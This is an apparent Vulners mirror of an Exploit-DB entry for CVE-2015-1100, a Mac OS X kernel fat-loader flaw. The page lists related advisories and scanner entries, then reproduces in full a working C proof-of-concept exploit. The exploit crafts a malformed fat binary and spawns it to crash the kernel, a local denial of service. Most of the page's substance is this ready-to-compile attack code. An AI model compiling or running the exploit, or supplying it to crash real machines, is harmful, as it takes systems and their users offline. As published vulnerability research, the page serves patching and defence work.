Lucene search
+L

Apple Mac OSX - Local Denial of Service

🗓️ 21 Apr 2015 00:00:00Reported by Maxime VillardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 45 Views

The Mac OSX Kernel Vulnerability allows local Denial of Service attack by exploiting a missing limit check in the fat loader, achieved through a crafted binary.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities
10 Apr 201900:00
nessus
nessus
Apple TV < 7.2 Multiple Vulnerabilities
10 Apr 201500:00
nessus
nessus
Apple iOS < 8.3 Multiple Vulnerabilities
10 Apr 201500:00
nessus
nessus
Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities (FREAK)
10 Apr 201500:00
nessus
nessus
Mac OS X Multiple Vulnerabilities (Security Update 2015-004) (FREAK)
10 Apr 201500:00
nessus
cnvd
Apple iOS Memory Out-of-Bounds Access Vulnerability
9 Apr 201500:00
cnvd
cve
CVE-2015-1100
10 Apr 201514:00
cve
cvelist
CVE-2015-1100
10 Apr 201514:00
cvelist
euvd
EUVD-2015-1243
7 Oct 202500:30
euvd
exploitpack
Apple Mac OSX - Local Denial of Service
21 Apr 201500:00
exploitpack
Rows per page
/*
 * 2015, Maxime Villard, CVE-2015-1100
 * Local DoS caused by a missing limit check in the fat loader of the Mac OS X
 * Kernel.
 *
 *  $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
 *  $ ./Mac-OS-X_Fat-DoS BINARY-NAME
 *
 * Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
 * Analysis:      http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <spawn.h>
#include <unistd.h>
#include <err.h>
#include <mach-o/fat.h>
#include <sys/stat.h>

#define MAXNUM (4096)
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))

void CraftBinary(char *name)
{
  struct fat_header fat_header;
  struct fat_arch *arches;
  size_t i;
  int fd;

  memset(&fat_header, 0, sizeof(fat_header));
  fat_header.magic = FAT_MAGIC;
  fat_header.nfat_arch = 4096;

  if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
    err(-1, "calloc");
  for (i = 0; i < MAXNUM0; i++)
    arches[i].cputype = CPU_TYPE_I386;

  if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
    err(-1, "open");
  if (write(fd, &fat_header, sizeof(fat_header)) == -1)
    err(-1, "write");
  if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
    err(-1, "write");
  if (fchmod(fd, S_IXUSR) == -1)
    err(-1, "fchmod");
  close(fd);
  free(arches);
}

void SpawnBinary(char *name)
{
  cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
  char *argv[] = { "Crazy Horse", NULL };
  char *envp[] = { NULL };
  posix_spawnattr_t attr;  
  size_t set = 0;
  int ret;

  if (posix_spawnattr_init(&attr) == -1)
    err(-1, "posix_spawnattr_init");
  if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
    err(-1, "posix_spawnattr_setbinpref_np");
  fprintf(stderr, "----------- Goodbye! -----------\n");
  ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
  fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
}

int main(int argc, char *argv[])
{
  if (argc != 2) {
    printf("Usage: %s BINARY-NAME\n", argv[0]);
  } else {
    CraftBinary(argv[1]);
    SpawnBinary(argv[1]);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2015 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 25.4
EPSS0.0104
45